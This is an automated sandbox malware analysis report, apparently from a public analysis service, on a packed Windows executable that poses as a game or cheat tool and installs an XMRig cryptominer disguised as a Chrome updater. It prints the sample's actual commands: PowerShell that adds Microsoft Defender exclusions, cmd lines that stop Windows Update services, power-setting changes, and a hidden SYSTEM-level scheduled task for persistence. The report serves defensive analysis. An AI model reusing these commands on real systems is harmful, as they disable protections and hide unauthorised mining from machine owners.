Analysis
-
max time kernel
153s -
max time network
147s -
platform
windows10-2004_x64 -
resource
win10v2004-20230221-en -
resource tags
arch:x64arch:x86image:win10v2004-20230221-enlocale:en-usos:windows10-2004-x64system -
submitted
29-04-2023 05:51
Behavioral task
behavioral1
Sample
给老子冲/影流之王🈹 (10).exe
Resource
win7-20230220-en
Behavioral task
behavioral2
Sample
给老子冲/影流之王🈹 (10).exe
Resource
win10v2004-20230221-en
Behavioral task
behavioral3
Sample
给老子冲/影流之王🈹 (5).exe
Resource
win7-20230220-en
Behavioral task
behavioral4
Sample
给老子冲/影流之王🈹 (5).exe
Resource
win10v2004-20230220-en
Behavioral task
behavioral5
Sample
给老子冲/影流之王🈹 (7).exe
Resource
win7-20230220-en
General
-
Target
给老子冲/影流之王🈹 (7).exe
-
Size
10.7MB
-
MD5
a090c26b4be46ffdf226a0b7a453f51f
-
SHA1
6a1743d359bef4ee18fdee6a6bf5199e69f07cfb
-
SHA256
bb93f0838f72a557c09e03593360e5458ab7d43921773d3961287a28201289ef
-
SHA512
83c90f4efff01cb84bb97030c84bac212b8b143723c7f1f3ecd3379000be85de3850d211519c2d429ebf4dba8b555c3a9a4c9a77f6ab856630907da681822691
-
SSDEEP
196608:/NQqSiD+bU2fbWzTRdtMQ4GraMTsGhbgOp4m:hmfqXtMQPravGh0Oym
Malware Config
Signatures
-
Suspicious use of NtCreateUserProcessOtherParentProcess 11 IoCs
Processes:
影流之王🈹 (7).exeupdater.exedescription pid process target process PID 4112 created 3140 4112 影流之王🈹 (7).exe Explorer.EXE PID 4112 created 3140 4112 影流之王🈹 (7).exe Explorer.EXE PID 4112 created 3140 4112 影流之王🈹 (7).exe Explorer.EXE PID 4112 created 3140 4112 影流之王🈹 (7).exe Explorer.EXE PID 4112 created 3140 4112 影流之王🈹 (7).exe Explorer.EXE PID 848 created 3140 848 updater.exe Explorer.EXE PID 848 created 3140 848 updater.exe Explorer.EXE PID 848 created 3140 848 updater.exe Explorer.EXE PID 848 created 3140 848 updater.exe Explorer.EXE PID 848 created 3140 848 updater.exe Explorer.EXE PID 848 created 3140 848 updater.exe Explorer.EXE -
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 2 IoCs
Processes:
影流之王🈹 (7).exeupdater.exedescription ioc process Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 影流之王🈹 (7).exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ updater.exe -
XMRig Miner payload 11 IoCs
Processes:
resource yara_rule behavioral6/memory/848-248-0x00007FF7BF810000-0x00007FF7C060A000-memory.dmp xmrig behavioral6/memory/2784-253-0x00007FF6DDE40000-0x00007FF6DE62F000-memory.dmp xmrig behavioral6/memory/2784-255-0x00007FF6DDE40000-0x00007FF6DE62F000-memory.dmp xmrig behavioral6/memory/2784-258-0x00007FF6DDE40000-0x00007FF6DE62F000-memory.dmp xmrig behavioral6/memory/2784-261-0x00007FF6DDE40000-0x00007FF6DE62F000-memory.dmp xmrig behavioral6/memory/2784-263-0x00007FF6DDE40000-0x00007FF6DE62F000-memory.dmp xmrig behavioral6/memory/2784-265-0x00007FF6DDE40000-0x00007FF6DE62F000-memory.dmp xmrig behavioral6/memory/2784-267-0x00007FF6DDE40000-0x00007FF6DE62F000-memory.dmp xmrig behavioral6/memory/2784-269-0x00007FF6DDE40000-0x00007FF6DE62F000-memory.dmp xmrig behavioral6/memory/2784-271-0x00007FF6DDE40000-0x00007FF6DE62F000-memory.dmp xmrig behavioral6/memory/2784-273-0x00007FF6DDE40000-0x00007FF6DE62F000-memory.dmp xmrig -
Drops file in Drivers directory 2 IoCs
Processes:
影流之王🈹 (7).exeupdater.exedescription ioc process File created C:\Windows\System32\drivers\etc\hosts 影流之王🈹 (7).exe File created C:\Windows\System32\drivers\etc\hosts updater.exe -
Stops running service(s) 3 TTPs
-
Checks BIOS information in registry 2 TTPs 4 IoCs
BIOS information is often read in order to detect sandboxing environments.
Processes:
影流之王🈹 (7).exeupdater.exedescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 影流之王🈹 (7).exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 影流之王🈹 (7).exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion updater.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion updater.exe -
Executes dropped EXE 1 IoCs
Processes:
updater.exepid process 848 updater.exe -
Processes:
resource yara_rule behavioral6/memory/4112-133-0x00007FF6B6AA0000-0x00007FF6B789A000-memory.dmp themida behavioral6/memory/4112-134-0x00007FF6B6AA0000-0x00007FF6B789A000-memory.dmp themida behavioral6/memory/4112-135-0x00007FF6B6AA0000-0x00007FF6B789A000-memory.dmp themida behavioral6/memory/4112-136-0x00007FF6B6AA0000-0x00007FF6B789A000-memory.dmp themida behavioral6/memory/4112-137-0x00007FF6B6AA0000-0x00007FF6B789A000-memory.dmp themida behavioral6/memory/4112-138-0x00007FF6B6AA0000-0x00007FF6B789A000-memory.dmp themida behavioral6/memory/4112-139-0x00007FF6B6AA0000-0x00007FF6B789A000-memory.dmp themida behavioral6/memory/4112-173-0x00007FF6B6AA0000-0x00007FF6B789A000-memory.dmp themida C:\Program Files\Google\Chrome\updater.exe themida behavioral6/memory/848-175-0x00007FF7BF810000-0x00007FF7C060A000-memory.dmp themida behavioral6/memory/848-176-0x00007FF7BF810000-0x00007FF7C060A000-memory.dmp themida behavioral6/memory/848-177-0x00007FF7BF810000-0x00007FF7C060A000-memory.dmp themida behavioral6/memory/848-178-0x00007FF7BF810000-0x00007FF7C060A000-memory.dmp themida behavioral6/memory/848-179-0x00007FF7BF810000-0x00007FF7C060A000-memory.dmp themida behavioral6/memory/848-180-0x00007FF7BF810000-0x00007FF7C060A000-memory.dmp themida behavioral6/memory/848-181-0x00007FF7BF810000-0x00007FF7C060A000-memory.dmp themida behavioral6/memory/848-191-0x00007FF7BF810000-0x00007FF7C060A000-memory.dmp themida C:\Program Files\Google\Chrome\updater.exe themida behavioral6/memory/848-248-0x00007FF7BF810000-0x00007FF7C060A000-memory.dmp themida -
Processes:
影流之王🈹 (7).exeupdater.exedescription ioc process Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA 影流之王🈹 (7).exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA updater.exe -
Drops file in System32 directory 3 IoCs
Processes:
powershell.exepowershell.exedescription ioc process File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log powershell.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
Processes:
影流之王🈹 (7).exeupdater.exepid process 4112 影流之王🈹 (7).exe 848 updater.exe -
Suspicious use of SetThreadContext 2 IoCs
Processes:
updater.exedescription pid process target process PID 848 set thread context of 100 848 updater.exe conhost.exe PID 848 set thread context of 2784 848 updater.exe explorer.exe -
Drops file in Program Files directory 2 IoCs
Processes:
影流之王🈹 (7).exeupdater.exedescription ioc process File created C:\Program Files\Google\Chrome\updater.exe 影流之王🈹 (7).exe File created C:\Program Files\Google\Libs\WR64.sys updater.exe -
Launches sc.exe 10 IoCs
Sc.exe is a Windows utlilty to control services on the system.
Processes:
sc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exepid process 4724 sc.exe 3500 sc.exe 3016 sc.exe 3864 sc.exe 3904 sc.exe 3784 sc.exe 1412 sc.exe 4640 sc.exe 1504 sc.exe 4816 sc.exe -
Modifies data under HKEY_USERS 64 IoCs
Processes:
powershell.exepowershell.exedescription ioc process Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" powershell.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
影流之王🈹 (7).exepowershell.exepowershell.exeupdater.exepowershell.exepowershell.exeexplorer.exepid process 4112 影流之王🈹 (7).exe 4112 影流之王🈹 (7).exe 2084 powershell.exe 2084 powershell.exe 4112 影流之王🈹 (7).exe 4112 影流之王🈹 (7).exe 4112 影流之王🈹 (7).exe 4112 影流之王🈹 (7).exe 4112 影流之王🈹 (7).exe 4112 影流之王🈹 (7).exe 4036 powershell.exe 4036 powershell.exe 4112 影流之王🈹 (7).exe 4112 影流之王🈹 (7).exe 848 updater.exe 848 updater.exe 2396 powershell.exe 2396 powershell.exe 848 updater.exe 848 updater.exe 848 updater.exe 848 updater.exe 848 updater.exe 848 updater.exe 1988 powershell.exe 1988 powershell.exe 848 updater.exe 848 updater.exe 848 updater.exe 848 updater.exe 2784 explorer.exe 2784 explorer.exe 2784 explorer.exe 2784 explorer.exe 2784 explorer.exe 2784 explorer.exe 2784 explorer.exe 2784 explorer.exe 2784 explorer.exe 2784 explorer.exe 2784 explorer.exe 2784 explorer.exe 2784 explorer.exe 2784 explorer.exe 2784 explorer.exe 2784 explorer.exe 2784 explorer.exe 2784 explorer.exe 2784 explorer.exe 2784 explorer.exe 2784 explorer.exe 2784 explorer.exe 2784 explorer.exe 2784 explorer.exe 2784 explorer.exe 2784 explorer.exe 2784 explorer.exe 2784 explorer.exe 2784 explorer.exe 2784 explorer.exe 2784 explorer.exe 2784 explorer.exe 2784 explorer.exe 2784 explorer.exe -
Suspicious behavior: LoadsDriver 1 IoCs
Processes:
pid process 664 -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
powershell.exepowershell.exepowercfg.exepowercfg.exepowercfg.exepowercfg.exedescription pid process Token: SeDebugPrivilege 2084 powershell.exe Token: SeDebugPrivilege 4036 powershell.exe Token: SeShutdownPrivilege 3452 powercfg.exe Token: SeCreatePagefilePrivilege 3452 powercfg.exe Token: SeShutdownPrivilege 2788 powercfg.exe Token: SeCreatePagefilePrivilege 2788 powercfg.exe Token: SeShutdownPrivilege 1208 powercfg.exe Token: SeCreatePagefilePrivilege 1208 powercfg.exe Token: SeShutdownPrivilege 2876 powercfg.exe Token: SeCreatePagefilePrivilege 2876 powercfg.exe Token: SeIncreaseQuotaPrivilege 4036 powershell.exe Token: SeSecurityPrivilege 4036 powershell.exe Token: SeTakeOwnershipPrivilege 4036 powershell.exe Token: SeLoadDriverPrivilege 4036 powershell.exe Token: SeSystemProfilePrivilege 4036 powershell.exe Token: SeSystemtimePrivilege 4036 powershell.exe Token: SeProfSingleProcessPrivilege 4036 powershell.exe Token: SeIncBasePriorityPrivilege 4036 powershell.exe Token: SeCreatePagefilePrivilege 4036 powershell.exe Token: SeBackupPrivilege 4036 powershell.exe Token: SeRestorePrivilege 4036 powershell.exe Token: SeShutdownPrivilege 4036 powershell.exe Token: SeDebugPrivilege 4036 powershell.exe Token: SeSystemEnvironmentPrivilege 4036 powershell.exe Token: SeRemoteShutdownPrivilege 4036 powershell.exe Token: SeUndockPrivilege 4036 powershell.exe Token: SeManageVolumePrivilege 4036 powershell.exe Token: 33 4036 powershell.exe Token: 34 4036 powershell.exe Token: 35 4036 powershell.exe Token: 36 4036 powershell.exe Token: SeIncreaseQuotaPrivilege 4036 powershell.exe Token: SeSecurityPrivilege 4036 powershell.exe Token: SeTakeOwnershipPrivilege 4036 powershell.exe Token: SeLoadDriverPrivilege 4036 powershell.exe Token: SeSystemProfilePrivilege 4036 powershell.exe Token: SeSystemtimePrivilege 4036 powershell.exe Token: SeProfSingleProcessPrivilege 4036 powershell.exe Token: SeIncBasePriorityPrivilege 4036 powershell.exe Token: SeCreatePagefilePrivilege 4036 powershell.exe Token: SeBackupPrivilege 4036 powershell.exe Token: SeRestorePrivilege 4036 powershell.exe Token: SeShutdownPrivilege 4036 powershell.exe Token: SeDebugPrivilege 4036 powershell.exe Token: SeSystemEnvironmentPrivilege 4036 powershell.exe Token: SeRemoteShutdownPrivilege 4036 powershell.exe Token: SeUndockPrivilege 4036 powershell.exe Token: SeManageVolumePrivilege 4036 powershell.exe Token: 33 4036 powershell.exe Token: 34 4036 powershell.exe Token: 35 4036 powershell.exe Token: 36 4036 powershell.exe Token: SeIncreaseQuotaPrivilege 4036 powershell.exe Token: SeSecurityPrivilege 4036 powershell.exe Token: SeTakeOwnershipPrivilege 4036 powershell.exe Token: SeLoadDriverPrivilege 4036 powershell.exe Token: SeSystemProfilePrivilege 4036 powershell.exe Token: SeSystemtimePrivilege 4036 powershell.exe Token: SeProfSingleProcessPrivilege 4036 powershell.exe Token: SeIncBasePriorityPrivilege 4036 powershell.exe Token: SeCreatePagefilePrivilege 4036 powershell.exe Token: SeBackupPrivilege 4036 powershell.exe Token: SeRestorePrivilege 4036 powershell.exe Token: SeShutdownPrivilege 4036 powershell.exe -
Suspicious use of WriteProcessMemory 38 IoCs
Processes:
cmd.execmd.execmd.execmd.exeupdater.exedescription pid process target process PID 2344 wrote to memory of 3016 2344 cmd.exe sc.exe PID 2344 wrote to memory of 3016 2344 cmd.exe sc.exe PID 2344 wrote to memory of 4816 2344 cmd.exe sc.exe PID 2344 wrote to memory of 4816 2344 cmd.exe sc.exe PID 2344 wrote to memory of 4724 2344 cmd.exe sc.exe PID 2344 wrote to memory of 4724 2344 cmd.exe sc.exe PID 2344 wrote to memory of 3864 2344 cmd.exe sc.exe PID 2344 wrote to memory of 3864 2344 cmd.exe sc.exe PID 2344 wrote to memory of 3904 2344 cmd.exe sc.exe PID 2344 wrote to memory of 3904 2344 cmd.exe sc.exe PID 3940 wrote to memory of 3452 3940 cmd.exe powercfg.exe PID 3940 wrote to memory of 3452 3940 cmd.exe powercfg.exe PID 3940 wrote to memory of 2788 3940 cmd.exe powercfg.exe PID 3940 wrote to memory of 2788 3940 cmd.exe powercfg.exe PID 3940 wrote to memory of 1208 3940 cmd.exe powercfg.exe PID 3940 wrote to memory of 1208 3940 cmd.exe powercfg.exe PID 3940 wrote to memory of 2876 3940 cmd.exe powercfg.exe PID 3940 wrote to memory of 2876 3940 cmd.exe powercfg.exe PID 3572 wrote to memory of 3784 3572 cmd.exe sc.exe PID 3572 wrote to memory of 3784 3572 cmd.exe sc.exe PID 3572 wrote to memory of 1412 3572 cmd.exe sc.exe PID 3572 wrote to memory of 1412 3572 cmd.exe sc.exe PID 3572 wrote to memory of 3500 3572 cmd.exe sc.exe PID 3572 wrote to memory of 3500 3572 cmd.exe sc.exe PID 3572 wrote to memory of 4640 3572 cmd.exe sc.exe PID 3572 wrote to memory of 4640 3572 cmd.exe sc.exe PID 3572 wrote to memory of 1504 3572 cmd.exe sc.exe PID 3572 wrote to memory of 1504 3572 cmd.exe sc.exe PID 1076 wrote to memory of 2480 1076 cmd.exe powercfg.exe PID 1076 wrote to memory of 2480 1076 cmd.exe powercfg.exe PID 1076 wrote to memory of 2008 1076 cmd.exe powercfg.exe PID 1076 wrote to memory of 2008 1076 cmd.exe powercfg.exe PID 1076 wrote to memory of 5076 1076 cmd.exe powercfg.exe PID 1076 wrote to memory of 5076 1076 cmd.exe powercfg.exe PID 1076 wrote to memory of 1384 1076 cmd.exe powercfg.exe PID 1076 wrote to memory of 1384 1076 cmd.exe powercfg.exe PID 848 wrote to memory of 100 848 updater.exe conhost.exe PID 848 wrote to memory of 2784 848 updater.exe explorer.exe -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵PID:3140
-
C:\Users\Admin\AppData\Local\Temp\给老子冲\影流之王🈹 (7).exe"C:\Users\Admin\AppData\Local\Temp\给老子冲\影流之王🈹 (7).exe"2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Drops file in Drivers directory
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
PID:4112 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2084 -
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc2⤵
- Suspicious use of WriteProcessMemory
PID:2344 -
C:\Windows\System32\sc.exesc stop UsoSvc3⤵
- Launches sc.exe
PID:3016 -
C:\Windows\System32\sc.exesc stop WaaSMedicSvc3⤵
- Launches sc.exe
PID:4816 -
C:\Windows\System32\sc.exesc stop wuauserv3⤵
- Launches sc.exe
PID:4724 -
C:\Windows\System32\sc.exesc stop bits3⤵
- Launches sc.exe
PID:3864 -
C:\Windows\System32\sc.exesc stop dosvc3⤵
- Launches sc.exe
PID:3904 -
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 02⤵
- Suspicious use of WriteProcessMemory
PID:3940 -
C:\Windows\System32\powercfg.exepowercfg /x -hibernate-timeout-ac 03⤵
- Suspicious use of AdjustPrivilegeToken
PID:3452 -
C:\Windows\System32\powercfg.exepowercfg /x -hibernate-timeout-dc 03⤵
- Suspicious use of AdjustPrivilegeToken
PID:2788 -
C:\Windows\System32\powercfg.exepowercfg /x -standby-timeout-ac 03⤵
- Suspicious use of AdjustPrivilegeToken
PID:1208 -
C:\Windows\System32\powercfg.exepowercfg /x -standby-timeout-dc 03⤵
- Suspicious use of AdjustPrivilegeToken
PID:2876 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#bcvarz#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4036 -
C:\Windows\System32\schtasks.exeC:\Windows\System32\schtasks.exe /run /tn "GoogleUpdateTaskMachineQC"2⤵PID:3040
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
PID:2396 -
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc2⤵
- Suspicious use of WriteProcessMemory
PID:3572 -
C:\Windows\System32\sc.exesc stop UsoSvc3⤵
- Launches sc.exe
PID:3784 -
C:\Windows\System32\sc.exesc stop WaaSMedicSvc3⤵
- Launches sc.exe
PID:1412 -
C:\Windows\System32\sc.exesc stop wuauserv3⤵
- Launches sc.exe
PID:3500 -
C:\Windows\System32\sc.exesc stop bits3⤵
- Launches sc.exe
PID:4640 -
C:\Windows\System32\sc.exesc stop dosvc3⤵
- Launches sc.exe
PID:1504 -
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 02⤵
- Suspicious use of WriteProcessMemory
PID:1076 -
C:\Windows\System32\powercfg.exepowercfg /x -hibernate-timeout-ac 03⤵PID:2480
-
C:\Windows\System32\powercfg.exepowercfg /x -hibernate-timeout-dc 03⤵PID:2008
-
C:\Windows\System32\powercfg.exepowercfg /x -standby-timeout-ac 03⤵PID:5076
-
C:\Windows\System32\powercfg.exepowercfg /x -standby-timeout-dc 03⤵PID:1384
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#bcvarz#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
PID:1988 -
C:\Windows\System32\conhost.exeC:\Windows\System32\conhost.exe2⤵PID:100
-
C:\Windows\explorer.exeC:\Windows\explorer.exe2⤵
- Suspicious behavior: EnumeratesProcesses
PID:2784
-
C:\Program Files\Google\Chrome\updater.exe"C:\Program Files\Google\Chrome\updater.exe"1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Drops file in Drivers directory
- Checks BIOS information in registry
- Executes dropped EXE
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:848
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
10.7MB
